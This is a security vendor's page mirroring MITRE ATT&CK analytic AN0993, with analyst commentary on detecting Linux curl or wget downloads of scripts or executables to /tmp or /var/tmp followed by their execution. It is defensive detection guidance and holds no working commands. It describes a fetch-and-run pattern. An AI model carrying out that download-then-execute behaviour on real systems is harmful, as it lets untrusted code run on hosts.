Live Active security incident? Get immediate response
MITRE ATT&CK® Analytic

AN0993: Analytic 0993

Detect curl/wget commands saving executable/script payloads to /tmp or /var/tmp followed by execution. Monitor packet captures or IDS/IPS alerts for injected responses or mismatched content types.

EnterpriseAN0993AnalyticObject v1.0 Modified
Discuss defensive coverage Back to ATT&CK
Glexia's Take

Analyst context for executives and security teams

Analyst confidence High

This analytic is about a common Linux risk pattern: command-line download tools such as curl or wget placing a script or executable in temporary directories like /tmp or /var/tmp and then running it. For leaders, the value is not the tool name itself; curl and wget are legitimate. The business issue is whether the organization can distinguish normal administration and automation from suspicious temporary payload execution before it becomes an incident-response blind spot.

Executive priority

Prioritize this as a Linux server and workload visibility check. Temporary-directory execution after network retrieval can matter to business continuity because it may occur on systems that host applications, infrastructure services, or cloud workloads. Executives should ask whether SOC teams receive command, process, file, and network evidence from Linux assets; whether alert triage can separate approved automation from unusual payload execution; and whether controls restrict unnecessary execution from writable temporary paths where feasible.

Technical view

Validate coverage for Linux events showing curl or wget saving executable or script-like payloads to /tmp or /var/tmp, followed by execution of the downloaded file. The supplied ATT&CK description also points to network-side evidence: packet captures or IDS/IPS alerts for injected responses or mismatched content types. SOC teams should correlate process creation, command-line arguments, file creation or modification in temporary directories, execution events, and network/IDS observations. Because no tactic and no separate official detection logic are supplied, detection engineering should treat this as a behavior pattern requiring local baselining rather than a complete rule specification.

Likely telemetry

  • Linux process creation and command-line telemetry for curl, wget, shells, interpreters, and executed files
  • File creation, modification, permission, and execution events under /tmp and /var/tmp
  • Network connection logs associated with Linux hosts running curl or wget
  • Packet capture, proxy, or IDS/IPS evidence showing injected responses or mismatched content types
  • Asset and workload context to identify approved automation, deployment tooling, and administrative scripts

Detection direction

  • Tune for the sequence of download-to-temporary-directory followed by execution, rather than alerting on curl or wget alone.
  • Baseline legitimate Linux administration, package installation, CI/CD, configuration management, and application deployment activity that may use temporary directories.
  • Prioritize unusual parent processes, unexpected users, uncommon destinations, newly executable files, and rapid download-then-execute timing.
  • Where packet capture or IDS/IPS exists, review alerts for content-type mismatches or injected response indicators in context with host execution telemetry.
  • Document blind spots where Linux hosts lack command-line logging, file execution visibility, or network inspection.

Mitigation priorities

  • Ensure critical Linux systems and workloads have reliable process, command-line, file, and network telemetry before relying on this analytic.
  • Reduce unnecessary execution from writable temporary directories where operationally feasible and test exceptions for business processes.
  • Apply least-privilege administration and restrict who can create, modify, and execute scripts on production Linux systems.
  • Use network and egress controls to limit unsanctioned download paths from sensitive Linux environments where appropriate.
  • Maintain allowlists or documented baselines for approved automation that legitimately downloads and executes temporary files.
Analyst notes and limits

The object is a detection analytic for Linux only. It has no supplied tactic, no relationships, and no separate official detection field beyond the description. Treat the analytic as a validation prompt for telemetry and correlation rather than a complete production detection rule.

This take is limited to the supplied ATT&CK fields and external reference. It does not establish attacker attribution, active exploitation, impact, or guaranteed detection. Local environment baselines are required to determine severity and false-positive rates.

Official MITRE ATT&CK definition

Analytic 0993

Detect curl/wget commands saving executable/script payloads to /tmp or /var/tmp followed by execution. Monitor packet captures or IDS/IPS alerts for injected responses or mismatched content types.

View the same entry on attack.mitre.org (MITRE-hosted reference; in-page links above use the Glexia ATT&CK library.)

Glexia analysis

How security teams should use this page

Treat this object as behavior context, not an attribution claim. Validate the related groups, software, data sources, and mitigations against official ATT&CK relationships and your own telemetry before making control-coverage decisions.

Relationship explorer

All related ATT&CK context

No relationships are available in the current normalized data for this object.

Change history

Object version and sync metadata

The fields below describe the current mirrored snapshot. When Glexia retains multiple ATT&CK source imports, you can open the table to compare the same object across releases (hashes and MITRE timestamps). For MITRE’s own release notes and roadmap, see ATT&CK resources — Updates .

ATT&CK release
19.1
Object version
1.0
Created
Modified
Raw hash
e33e3d275c4bbe78...
Imported snapshots across ATT&CK releases (1)
Release Bundle imported Object version Modified Status Raw hash
19.1 1.0 Current bundle e33e3d275c4b…
Raw source

Mirrored ATT&CK source object

The raw object is retained through the mirrored ATT&CK source bundle and object hash. The raw endpoint returns the exact object from the mirrored bundle when available.

Open mirrored raw JSON Open MITRE-hosted copy
Source references

External references and citations

MITRE external references are preserved separately from Glexia analysis so citations remain traceable to their original source records.

  1. [1]
    mitre-attack AN0993
    Open source URL
Source and licensing

Source: MITRE ATT&CK®. © 2026 The MITRE Corporation. This work is reproduced and distributed with the permission of The MITRE Corporation. MITRE ATT&CK and ATT&CK are registered trademarks of The MITRE Corporation. Glexia is not affiliated with or endorsed by MITRE.

Official MITRE ATT&CK site Official STIX data repository MITRE ATT&CK terms of use